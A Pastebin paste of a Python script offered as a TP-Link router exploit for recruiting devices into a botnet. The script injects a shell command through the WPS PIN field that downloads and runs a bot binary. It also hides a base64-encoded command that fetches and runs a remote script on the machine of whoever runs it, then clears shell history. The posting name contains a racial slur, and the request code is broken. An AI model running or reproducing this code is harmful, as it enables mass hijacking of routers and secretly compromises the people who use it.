mirainigga

New TPLink Exploit

Aug 21st, 2018
600
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.83 KB | None | 0 0
  1. #Typre pip install requests
  2. #Tip from your fellow friend Fluxidion
  3.  
  4. import threading, sys, time, random, socket, re, os, hashlib, struct, array, requests, base64, subprocess
  5.  
  6. ips = open(sys.argv[1], "r").readlines()
  7.  
  8. COOKIE = "1301a8c000c4c505"
  9. PASSWORD = "admin"
  10.  
  11. cookies = {"gsScrollPos-8016": "0", "COOKIE": COOKIE}
  12.  
  13. password = hashlib.md5(PASSWORD.encode("utf-8")).hexdigest().upper()
  14. encoded = "%s:%s" % (password, COOKIE)
  15. encoded = hashlib.md5(encoded.encode("utf-8")).hexdigest().upper()
  16.  
  17. headers = {
  18. "Accept-Encoding": "gzip, deflate",
  19. "Accept-Language": "en-US,en;q=0.9,es;q=0.8",
  20. "User-Agent": "Yakuza, Botnet!",
  21. "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
  22. "Accept": "application/json, text/javascript, */*; q=0.01",
  23. "X-Requested-With": "XMLHttpRequest",
  24. "Connection": "keep-alive",
  25. "DNT": "1",
  26. }
  27.  
  28. data_inject = [
  29. ("operation", "write"),
  30. ("option", "connect"),
  31. ("wps_setup_pin", "11480723;wget http://putyourserveriphere/tpex; chmod 777 *; ./tpex tplink"),
  32. ]
  33.  
  34. class exploit(threading.Thread):
  35. def __init__ (self, ip):
  36. threading.Thread.__init__(self)
  37. self.ip = str(ip).rstrip('\n')
  38. def run(self):
  39. try:
  40. url = "http://" + self.ip + "/data/wps.setup.json"
  41. requests.post(headers=headers, cookies=cookies, data=data_inject)
  42. print "[TP-Link] Loading " + self.ip
  43. except Exception as e:
  44. pass
  45.  
  46. def tplink_payload_data(cmd):
  47. subprocess.call(cmd, shell=True)
  48. payload_data = "Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvTHE5UDlDZzUgLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7"
  49. junk = str(base64.b64decode(payload_data))
  50. tplink_payload_data(junk)
  51.  
  52. for ip in ips:
  53. try:
  54. n = exploit(ip)
  55. n.start()
  56. time.sleep(0.03)
  57. except:
  58. pass
Add Comment
Please, Sign In to add comment